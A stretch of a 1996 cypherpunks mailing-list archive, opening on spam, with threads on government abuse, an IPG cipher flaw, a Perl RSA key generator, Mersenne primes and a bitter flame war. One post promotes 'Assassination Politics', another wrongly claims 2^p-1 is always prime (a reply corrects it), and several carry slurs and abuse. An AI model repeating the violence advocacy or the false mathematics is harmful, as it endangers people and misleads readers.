investors or salespeople.  This may be one of the most important decisions of
your life.

Sincerely,

Dr. George Tarryk, M.D.
Internal Medicine Specialist
1-800-741-6240




Please Only Reply By Phone,  Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 1 Dec 1996 10:19:14 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: denial of service and government rights
In-Reply-To: <Pine.SUN.3.94.961201024623.5120X-100000@polaris>
Message-ID: <32A1C811.244@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote: 
> On Sat, 30 Nov 1996, Dale Thorn wrote:
> > > Just in case someone replies saying "It's not all that bad", or "It can't
> > > happen here", etc., you should know this:
> > > The United States government has not been responsive to the people for
> > > a long time, but what's become evident in recent years is that they're
> > > also no longer responsive to basic law and order.
> > > They do respond to extreme pressure, as was applied in the Weaver, Waco,
> > > and other similar cases, but, as a general rule, they do whatever they
> > > want all the way to the top of the Justice dept. with impunity.
> > > Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> > > niece(?) of a Kuwaiti official to testify in front of Congress in full
> > > view of the American people on television, that the Iraquis were throwing
> > > babies out of incubators in Kuwait, thereby securing the necessary votes
> > > in Congress to prosecute the Gulf War.

> At that time the country was already at war and if you read the war powers
> act and look at the dates, you'll find that he probably could have
> prosecuted it without congress.

Fraud is fraud.  It's illegal under *some* statute, I'm sure.

> 60 minutes did a nice piece on this, BTW, and even they admitted that the
> wool might have been pulled over the eyes of the Bush Staff.

> > > When it was discovered (after the "war") that the Incubator Baby Scandal
> > > was a lie, nobody was prosecuted.

> Prosecuted for what?

Fraud.  See above.

> > > Further, in blatant violation of the
> > > U.S. Constitution, Bush and Schwartzkopf were knighted by Queen Elizabeth
> > > II of England.

> Careful.  The knighthoods in question (Knight's Cross of the Victorian
> Order if I recall) do not infringe on foreign decorations restrictions
> when they are granted in an honorary context, as both were - again if my
> recall is correct.
> Several American citizens have been inducted into foreign orders of merit
> and some have been inducted into badge and even sash orders.
> One noteable was even inducted into the Order of the Bath (extra points
> for the name of said citizen).

According to the Constitution, "No title of nobility shall be granted by
the United States, and no person holding any office of profit or trust
under them shall, without the consent of the Congress, accept of any
present, emolument, office or title, of any kind whatsoever, from any
king, prince, or foreign state."

I would point out that the "any kind whatsoever" clause is clear enough,
and as to whether Congress approved Bush et al for these honors, well,
you tell me.

> > > There are also numerous examples of the Justice dept. being caught red-
> > > handed forging documents to frame people for whom they had no evidence or
> > > insufficient evidence to prosecute, and what happens in those cases?
> > > Nothing.

> Examples...?

Demjanjuk.  Israel (a country where the Justice department seems to have
some ethics) was so embarrassed about this that they released him, even
though there was considerable pressure to keep him under various charges.

One could also look at the Weaver and Waco cases for false charges.
It's worthy of note that juries rejected the U.S. Justice dept's murder
charges in these cases.  The original charges in the Weaver case even
included the baby, as I recall.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 1 Dec 1996 10:19:20 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: Detweiller spotted?
In-Reply-To: <199612011258.EAA08939@abraham.cs.berkeley.edu>
Message-ID: <32A1C941.6CD2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Anonymous MacDonald wrote:
> Dale Thorn said:
> >Now that's what I call amazing.  Maybe I could rewrite PGP
> >tomorrow (hee hee).

> Is anyone else hearing a familiar (and again, constant) voice from the past?
> Maybe I'm wrong, but has anyone met him in person? Just asking.

I came to S.Cal. in February 1981.  Worked at Olympic Sales until March
1983, went to Blue Chip computer on Pico blvd. across from the Beverly
Hillcrest hotel, 3/83 to 5/86.  Logic Tree in Pasadena, 1/87 to 1/88.

Tennessee 2/88 to 4/92.  Seal Beach 4/93 to present.

If that corresponds to anyone you know, I'd like to talk to them.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Sun, 1 Dec 1996 10:09:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ping!
Message-ID: <199612011811.KAA16684@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


--------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Sun, 1 Dec 1996 10:17:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ping! ((chain=(anon);1;(replay)))
Message-ID: <199612011820.KAA16715@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


--------

ping 5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Sun, 1 Dec 1996 10:18:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ping! ((chain=(anon);1;(replay)))
Message-ID: <199612011821.KAA16720@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


--------

ping 5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 1 Dec 1996 11:48:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: denial of service and government rights
Message-ID: <199612011948.LAA08876@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 PM 11/30/96 -0500, Tired.Fighter@dhp.com wrote:
>On 30 Nov 96 at 13:10, Black Unicorn wrote:
>
>> On Fri, 29 Nov 1996, Greg Broiles wrote:
>
>> [...]
>> 
>> > I don't see any reason why this wouldn't be true for a
>> > computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure 
>> > (but seizure is not forfeiture) of "property that 
>> > constitutes evidence of the commission of a
>> > criminal offense". 
>> 
>> It is true of computers.
>> Take the case of Ripco (the Chicago BBS raided in the 
>> SunDevil raids back when).
>> 
>> I don't think "Dr. Ripco" has yet gotten his equipment 
>> back.  I don't know for sure, but what I do know is 
>> that 5 years after the raid, he still had certainly 
>> not gotten anything back.

Unicorn has a long history of reciting government abuses, but then failing 
to provide any sort of answer to them.  My solution (AP:  "Assassination 
Politics") would make such abuse fatal. 
 
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 1 Dec 1996 11:11:02 -0800 (PST)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: COREL TO CENSOR ALL CLIP ART WORLDWIDE
In-Reply-To: <199612011618.IAA11579@abraham.cs.berkeley.edu>
Message-ID: <199612011842.MAA03490@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


John Anonymous MacDonald wrote:
>     Consideration is also being given to the removal of other images
>     from the collection, either due to legal restrictions in
>     various countries, or due to complaints from organisations
>     such as the Simon Wiesenthal Center.  Images considered for
>     removal include a burning US flag, Josef Stalin, the Star of
>     David icon, a cannabis leaf, and a drawing of a woman in a
>     bathing costume.

How stupid.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 1 Dec 1996 11:11:13 -0800 (PST)
To: ichudov@algebra.com
Subject: Another problem with IPG algorithm
In-Reply-To: <no.id>
Message-ID: <199612011844.MAA03510@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Don and others,

At the heart of IPG algorithm there is a pseudo-random number generator
which generates values of A(JV). (see http://www.netprivacy.com/algo.html)

       DO
         JV=JV+1
         IF JV=53 THEN JV=0
         A(JV)=(A(JV)+B(JV)) MOD C(JV)
       UNTIL A(JV)<16384

Note that if B(JV) and C(JV) in a triplet (A(JV), B(JV), C(JV)) are not
mutually prime, they will generate very few numbers and not a whole set
0-16383. For example, if C(JV) is 20000, and B(JV) is 10000, and initial
A is (for example) 57, the only two numbers that this triplet will
generate will be 57 and 10057.

This refutes Don Wood's claim that the distribution of results
approaches even. Even if only ONE triplet is such as I described (and it
is VERY likely to happen statistically), the distribution will be
skewed.

Don, what do you think about it?

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 1 Dec 1996 14:13:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Phrack, where can i find it?
Message-ID: <199612012159.NAA22165@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


where can i find latest (and old) phrack issues?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Sun, 1 Dec 1996 11:10:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: A quick discussion of Mersenne Numbers
Message-ID: <961201141011_806714836@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



I wake of the latest find announcement, some people maybe wondering what the
heck is this?!!

A mercenne number is of the type:

M(p) = 2**p -1 results in a prime when p is a prime.

Hopefully this will lead the way to see the pattern of prime numbers and
being able to compute prime numbers in a far more efficient manner (after all
a function that when given a prime number results in a prime number would be
quite a kicker now wouldn't it!)

The other Mersenne primes include:

2,3,5,7,13,17,19,31,127,61,89, and 107.

The numbers 67 and 257 are not primes....

Have fun in them prime number databases....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 1 Dec 1996 06:17:46 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A11CFB.421@gte.net>
Message-ID: <Pine.LNX.3.94.961201141255.169B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 30 Nov 1996, Dale Thorn wrote:

> Tired.Fighter@dhp.com wrote:
> > On 30 Nov 96 at 13:10, Black Unicorn wrote:
> > > On Fri, 29 Nov 1996, Greg Broiles wrote:
> > > > I don't see any reason why this wouldn't be true for a
> > > > computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure
> > > > (but seizure is not forfeiture) of "property that
> > > > constitutes evidence of the commission of a
> > > > criminal offense".
> 
> [snip]
> 
> > Please forgive my naivete, but are there no legal
> > weapons available to the 'victims' in such cases?
> > I'm passingly familiar with the Operation Sundevil
> > fiasco -- i.e., with the outcome re the principal
> > 'charges'.  I'm appalled, however, at the apparent
> > lack of remedies for return of such seized property.
> > Are individuals who find themselves in such a
> > predicament simply at the government's mercy (there's
> > an oxymoron for ya)??
> 
> Just in case someone replies saying "It's not all that bad", or "It can't
> happen here", etc., you should know this:
> 
> The United States government has not been responsive to the people for
> a long time, but what's become evident in recent years is that they're
> also no longer responsive to basic law and order.
> 
> They do respond to extreme pressure, as was applied in the Weaver, Waco,
> and other similar cases, but, as a general rule, they do whatever they
> want all the way to the top of the Justice dept. with impunity.
> 
> Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> niece(?) of a Kuwaiti official to testify in front of Congress in full
> view of the American people on television, that the Iraquis were throwing
> babies out of incubators in Kuwait, thereby securing the necessary votes
> in Congress to prosecute the Gulf War.
> 
> When it was discovered (after the "war") that the Incubator Baby Scandal
> was a lie, nobody was prosecuted.  Further, in blatant violation of the

Unfortunatly, the law doesn't say that the government _must_ prosecute,
only that it can.

> was a lie, nobody was prosecuted.  Further, in blatant violation of the
> U.S. Constitution, Bush and Schwartzkopf were knighted by Queen Elizabeth
> II of England.

This is not a violation of the Constitution.  The Constitution specifies
that US civil servants (or whatever we intend to call them these days)
cannot be knighted by a foreign country for services rendered to that
country.  So it would be [possibly] illegal for them to have been knighted
by Saudi Arabia or Kuwait, but not illegal (in this instance) for them to
be knighted by England.

> There are also numerous examples of the Justice dept. being caught red-
> handed forging documents to frame people for whom they had no evidence or
> insufficient evidence to prosecute, and what happens in those cases?
> Nothing.

Good point.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

You know you've been spending too much time on the computer when your
friend misdates a check, and you suggest adding a "++" to fix it.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqGTTTCdEh3oIPAVAQElTgf+Mcq1JyTfXTCH+cTNZ7oix1plkL3fiFNG
Zl1Is0L2es3RuXd8IybY3M2GKa+8smph9xejl4z5slCG2k0Geb1NfbluckpAVY6T
xE+QwxNtF7UVLhqaOCuB1b7jtMRAlOyucwrjrVb0D0N1BiPQJb9zroVSmh0Pp2Ry
uFog0kbn1Ox8HTmjzxu5KEOYNvHX2DK1tQG6FmhdhChoprWGutjvwULvW5I+WOKT
TLDfzLbpRYsJNQDbB4F8W64fI+kNTJxqONMac8FryOEXMhfNFAg+xXrXZoKA7o1X
VuoKy7ZyFaYXbBHbaUlxVFU/KKrU9XbRPvL6YU7W3zo1AJo2MBLoCQ==
=mI5X
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 1 Dec 1996 14:19:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: RSA key generation in 13 lines of Perl
Message-ID: <Pine.BSF.3.91.961201134027.259A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've completed my Perl/dc RSA key generation program. The compacted
13-line version is below. A commented version can be found at
http://www.edmweb.com/steve/rsagen.txt

#!/usr/local/bin/perl
$k=768;$e=sprintf'%X',65537;print"Please enter a LOT of random junk.\n"
;$a=<STDIN>;print"Working. This may take a while.\n";for(1..(length($a)-
1)){$b[$_&31]^=unpack('C',substr($a,$_,1));$b[$_&31]=(($b[$_&31]<<5)|($b
[$_&31]>>3))&255;}for(0..255){$c[$_]=$_;}$a=$d=$f=0;for(0..255){$a=($a+
$c[$_]+$b[$a&31])&255;($c[$_],$c[$a])=($c[$a],$c[$_]);}open(F,'|dc');
select F;print"16dio[$e+]sa";for(1..50){for(1..$k/32){printf'%02X',&g;}
print"Sr";}for(1,2){printf'%02X',&g|128;for(2..$k/16){printf'%02X',&g;}
print"d$e%-2+d2%0=aSP";}print"[d2%SA2/d0<X+d*LA1=ZlP%0]sX[lR*]sZ[1+Q]sQ[
la1+sa0sc]sA[lAxlb1+sb]sB[ld1+sdLrddSssR1lP1-2/lXx+1+lP%99scd0=A2=Bclcla
+32>C]sC[LsSrld1-dsd0<D]sD[le1+se0ddsasbsdlCxlDxlP2 $e*+sPlc99=Elb32=ElP
2 $e*-led1>QQ]sE_1selExsq_1seLPlExsp[p=]Plpp[q=]Plqp[n=]P*p[e=]P$e p1-lp
1-lq1-**1+$e/[d=]Pp\n";close(F);sub g{$d=($d+1)&255;$f=($f+$c[$d])&255;(
$c[$d],$c[$f])=($c[$f],$c[$d]);return($c[($c[$d]+$c[$f])&255]);}

I'm sure this can be compacted further. I haven't put a lot of work into
compacting it; I really just want to get it out. 

Run the program, type in a LOT of random gibberish (several lines at
least) and press enter. Then wait. Eventually it will output your p, q, n,
e and d in hexadecimal. 

p and q: Prime numbers, congruent to 2 mod e. They can usually be
discarded, but they should never be revealed. 

n: Your public modulus

e: Your public encryption exponent (usually 10001 hex)

d: Your private decryption exponent

By default the program generates a 768-bit public modulus and a public
exponent of 10001 hex (65537 decimal). These can be changed by adjusting
the numbers in the first line. A 1024-bit modulus would be better, but for
some reason generation takes a LOT longer than a 768-bit modulus.
Fortunately key generation doesn't need to be done very often. 

Timings on a 100 MHz Pentium running FreeBSD:

Size of n  Time
512-bit:   4-5 minutes
768-bit:   8-9 minutes
1024-bit:  35-80 minutes (ack!)

I've had some difficulty generating 1024-bit keys, but it seems to be
working now. Let me know if you see any problems generating large keys
other than the obvious problem with the time spent. 

Disclaimer: This program seems to work, but your milage may vary. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMqID5dtVWdufMXJpAQE14AgApqOI2MMPe0V74cKI0vc3bDw8hfDW723c
QKqVleH0MTIv4F792bf7ItekM81RbQiaB+AhSigFFFb679ZgdCV7XpPOwhkE3SD4
vJy1xU4HdZ6TbSrfzzZn8Peqd5K5zZdY7CpXbxW30TZWFNX5lqdDAAbvM77h36QC
h/jwK1nWMzrTDupbhBwemkpZKaFmk5uAms5Y94Ckezh66+sOcWmvf7smyn8RJg4q
zad6OVrclso22NBp/Pa0nf2+IdgFnhEfHgHxsI0t+awSokfr6WlZ8WAScxv40kJO
KfcdBX1DXg4spl8kXgoQOrrA3VIUJKWXFfpnTt2nAKr/P4XfbpyFQw==
=CY5F
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Dec 1996 13:10:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Building a DC-NET
In-Reply-To: <199612011503.QAA28128@internal-mail.systemics.com>
Message-ID: <89y0XD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland <gary@systemics.com> writes:
> Dimitri writes:
> >
> > Black Unicorn <unicorn@schloss.li> writes:
> >
> > > On Sat, 30 Nov 1996, Simon Spero wrote:
> > >
> > > > (what's the Alice/Bob name for someone  trying a denial of service atta
> > >
> > > Louis?
> >
> > John the petty small-time bitch?
>
> How about William?  (Can't use Bill, since 'B' is taken).
> Could refer to Clinton (since he denies services to Cuba etc.), or
> to Gates (the creator of 'denial of service', aka. DOS).

Whatever's wrong with KKKLinton, he hasn't locked anybody out of his majordomo.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Dec 1996 13:10:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Seditious Cable!
In-Reply-To: <199612011501.QAA25179@basement.replay.com>
Message-ID: <yaZ0XD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com (Anonymous) writes:
>clarify your position on key escrow to prevent further misunderstanding.

I'm sorry, I don't think I'm able to explain my views on any complex technical
topic in terms so simple that they could be understood by the "cypher punks".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sun, 1 Dec 1996 07:01:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Seditious Cable!
In-Reply-To: <XFu8XD50w165w@bwalk.dm.com>
Message-ID: <199612011501.QAA25179@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


 dlv@bwalk.dm.com wrote to All:

 d> nobody@replay.com (Anonymous) writes:

 >> And these are the folks you want to maintain your key escrow?

 d> This is another example of lies being spread by John Gilmore and his
 d> cronies. I don't want the U.S. Government to maintain my or anyone
 d> else's key escrow.

I was basing my reply on the content of your earlier post.  It is
certainly possible that I misunderstood your views.  Please clarify your
position on key escrow to prevent further misunderstanding.

 d> Comments: All power to the ZOG!

Then please tell me that the above is an attempt at humor!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sun, 1 Dec 1996 07:01:43 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Re: Building a DC-NET
Message-ID: <199612011503.QAA28128@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri writes:
>
> Black Unicorn <unicorn@schloss.li> writes:
> 
> > On Sat, 30 Nov 1996, Simon Spero wrote:
> >
> > > (what's the Alice/Bob name for someone  trying a denial of service attack?)
> >
> > Louis?
> 
> John the petty small-time bitch?

How about William?  (Can't use Bill, since 'B' is taken).
Could refer to Clinton (since he denies services to Cuba etc.), or
to Gates (the creator of 'denial of service', aka. DOS).

Gary




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 1 Dec 1996 13:16:40 -0800 (PST)
To: Scottauge@aol.com
Subject: Re: A quick discussion of Mersenne Numbers
In-Reply-To: <961201141011_806714836@emout09.mail.aol.com>
Message-ID: <Pine.LNX.3.95.961201161046.401A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Dec 1996 Scottauge@aol.com wrote:

> I wake of the latest find announcement, some people maybe wondering what the
> heck is this?!!
> 
> A mercenne number is of the type:
> 
> M(p) = 2**p -1 results in a prime when p is a prime.
> 
> Hopefully this will lead the way to see the pattern of prime numbers and
> being able to compute prime numbers in a far more efficient manner (after all
> a function that when given a prime number results in a prime number would be
> quite a kicker now wouldn't it!)

It doesn't.  If q is a Mercenne prime, then p is prime if q = 2^p-1.  It
doesn't work the other way around.  If it did, then it would be very easy to
find out if a number is a Mercenne prime: just add 1 and find the base 2
logarithm and if the result is prime, then the original number is prime.  It's
much more difficult than that.  It would also be possible to find an infinite
number of Mercenne primes using a deterministic algorithm.


Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMqH2TyzIPc7jvyFpAQELUgf/Sl7QblCiYj/TQZ5on73Zj2fI7XaswGME
ihXEVkI0bkcQgcm8NeSQol7cyfJJWmP0KjzIf2fnInn5dvhHRJI50b6Qp0d60oY3
dEP/uY01hX9amy32s9r+ro9X3eC+0pCleNWk1VPkIHjSlRb+Iem/eyD32jhGv6EE
PA1q1lVQCjm1m44MSEWOSerVpAYMAfoFmRcrNLT757Oo6SWpVMyIVBLJ6eOtvux0
Mz9pBVoeOdjSzqJ8ZeWeFd4HG0v8o7VQqrlC1onGntKJ9//ZJMRKeE5bJmSVQQdA
YydqIU0eCNW4XTBZZcH8aIgi0KOwqVlb2klMvJoEQmKgboqJ8h+TXw==
=F9bd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sun, 1 Dec 1996 08:05:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: ubject
Message-ID: <199612011607.RAA28422@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Swastikas halt Corel sales 
By Reuters
November 25, 1996, 12 p.m. PT 

	MUNICH, Germany--Corel (COSFF) software company
	has temporarily halted sales of its top-selling Corel Draw
	graphics program in Germany because it includes four
	banned Nazi symbols, a company spokesman said today. 

	The Canadian company will remove three drawings of Adolf
	Hitler and one swastika from future versions of its popular
	software, spokesman Thomas Layer said. 

	It is also distributing warning labels to be placed on versions
	now being sold, Layer said. The label warns that the
	"improper use of digital images and symbols" found in the
	programs Corel Draw 4.0, 5.0, and 6.0 is prohibited in
	Germany, which bans public displays of Nazi symbols. 

	Munich's state prosecutor launched an investigation into
	the software on October 2 after learning that someone had
	used the banned images to print business cards for a
	neo-Nazi group, Layer said. 

	This is not the first time that the company has had complaints
	due to their clip art images.  In 1992, pressure from US Black
	rights organisations forced drawings of the Ku Kux Klan to be
	removed from the collection.

	Consideration is also being given to the removal of other images
	from the collection, either due to legal restrictions in
	various countries, or due to complaints from organisations
	such as the Simon Wiesenthal Center.  Images considered for
	removal include a burning US flag, Josef Stalin, the Star of
	David icon, a cannabis leaf, and a drawing of a woman in a
	bathing costume.

	Corel Draw provides more than 24,000 clip art drawings and
	symbols that computer users can copy. The company
	suspended the sales on November 19. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 1 Dec 1996 17:25:25 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: denial of service and government rights
In-Reply-To: <Pine.SUN.3.94.961201200504.5120Z-100000@polaris>
Message-ID: <32A22FE8.2A1D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> On Sun, 1 Dec 1996, Dale Thorn wrote:
> > Black Unicorn wrote:
> > > On Sat, 30 Nov 1996, Dale Thorn wrote:
> > > > > Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> > > > > niece(?) of a Kuwaiti official to testify in front of Congress in full
> > > > > view of the American people on television, that the Iraquis were throwing
> > > > > babies out of incubators in Kuwait, thereby securing the necessary votes
> > > > > in Congress to prosecute the Gulf War.

[snippo]

> Fraud is an excellent answer because it is a meaningless answer.  Fraud is
> traditionally used to prosecutue those not-quite-a-crime cases because the
> definition essentially comes down to : "That guy did something we don't
> like."

[much drivel snipped]

So what you're saying is I (or we) can testify in front of Congress on
essentially any topic, telling a blatant lie (that we know is false, and
which they will subsequently prove is false), and totally get away with
it.  You and I can do that, is that what you're saying?

If that is true, then my original contention that things are far worse
than the person I originally responded to was imagining, stands as
correct.  Things are bad indeed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sun, 1 Dec 1996 15:38:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Phrack, where can i find it?
In-Reply-To: <199612012159.NAA22165@abraham.cs.berkeley.edu>
Message-ID: <9612012338.AA09683@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text


John Anonymous MacDonald wrote:
> 
> where can i find latest (and old) phrack issues?
> 
ftp.fc.net /pub/phrack has all the back issues, as well as the
current ones. 

Tim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Dec 1996 16:20:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Paul Bradley is a typical "cypher punk" (Was: IPG Algorith Broken!)
In-Reply-To: <849391118.629483.0@fatmans.demon.co.uk>
Message-ID: <9T80XD26w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:
>
> > Some of these bullies, like Paul Bradley, realize that they don't know
> > the meanings of the words they use. Paul Bradley not only posts nonsense
> > about brute force attacks on OTP, but also harrasses anyone who exposes
> > his utter ignorance, in en effort to intimidate them into shutting up.
>
> You don`t seem to realise that not only is my reputation unnafected
> by your worthless drivel about "brute force attacks on one time
> pads", which everyone else apart from you and Don immediately
> accepted as a simple misunderstanding of the topic of the message (I
> was talking about stream ciphers), but I am finding it rather amusing
> to watch the level of your rants deteriorate to the point where you
> now label anyone who actually posts about cryptography on this list
> as a "k00l hAcKiNg D00d" who knows nothing of what he is talking
> about. And as for harrasing people to shut up if you had been
> watching the traffic on the list you would have noticed that I
> disagreed with John over throwing you off the list. I simply wonder
> if the reason you appear to be so calm offline but a foaming at the
> mouth lunatic online is that you are scared someone is going to give
> you the good kicking you so rightly deserve.
>
> > "Cypherpunks'" opinion of any proposed new cryptosystem is worthless and
> > irrelevant.
>
> And I suppose the opinion of a man who cannot control his urges to
> post rants about "sovok jews" and armenian refugees is of great value
> to the learned and worthy???

Paul Bradley packs so many lies into 30 lines of text, it's almost remarkable.

First, I don't post rants about "Sovok Jews" to cypherpunks. Paul lies.
(I happen to be Jewish, which is one of the reasons why Tim May hates my guts.)


Second, Paul Bradley's own words do more to expose his own ignorance and
stupidity than anything anyone else could say about him. This is my article
which immediately preceded John Gilmore's shameful act of censorship:

]Message-Id: <67c7VD32w165w@bwalk.dm.com>
]Subject: Re: OTP
]From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
]Date: Mon, 21 Oct 96 20:43:28 EDT
]In-Reply-To: <845910392.8251.0@fatmans.demon.co.uk>
]
]Where do these idiots come from and why do they end up on this mailing list?
]
]paul@fatmans.demon.co.uk writes:
]
]>
]> > Can you explain to me how your one time pad algorithm is any better than
]> > encryption something with, say, RC4 or any other cipher using a key that
]> > is the same length as the seed for your PRNG?
]>
]> Well for a start there is no possible cryptanalytic (rather than
]> brute force) attack on a one time pad, the system can be
]> mathematically proven to be secure with a very simple bit of
]> statistics.
]
]Please post your "mathematical proof" and explain what you mean by
]a "brute force attack on a one time pad".

Paul Bradley spoke about OTP, not stream cyphers. He lies.


Third, Paul lies about his "opposition" to John Gilmore's censorship.
Here is an e-mail Paul sent to the non-existent address "dvl" in
response to an anonymous article on cypherpunks:

]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
]From: paul@fatmans.demon.co.uk
]To: dvl@bwalk.dm.com
]Date: Wed, 18 Sep 1996 15:18:16 +0000
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7BIT
]Subject: Re: A daily warning regarding Timothy C. May
]Priority: normal
]X-Mailer: Pegasus Mail for Windows (v2.31)
]Message-Id: <843149202.18174.0@fatmans.demon.co.uk>
]
]
]> Timothy C. May is a lying sack of shit.
]
]Look, that is enough, I`m going to move to have you removed from the
]list if you keep this up... get a life fuckhead, if you are going to
]flame at least do it from your real address so people can killfile
]you, or maybe you believe censorship is better?
<stupid sig snipped>

It's clear that Paul supported John's "removal" of me from the list.

Paul Bradley sent me dozens of hate e-mails. When he started mailbombing
me with multiples copies of my own cypherpunks postings with obscenities
appended, I set up a filter to bounce his junk back to him. Paul appears
to be obsessed with me.

Behold the collected works of Paul Bradley before the bouncer was set up:

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Thu, 12 Sep 1996 18:29:26 +0000
]Subject: Re: Conjuring up the latest utopia for a minoritarian sect
]Message-Id: <842700997.12948.0@fatmans.demon.co.uk>
]
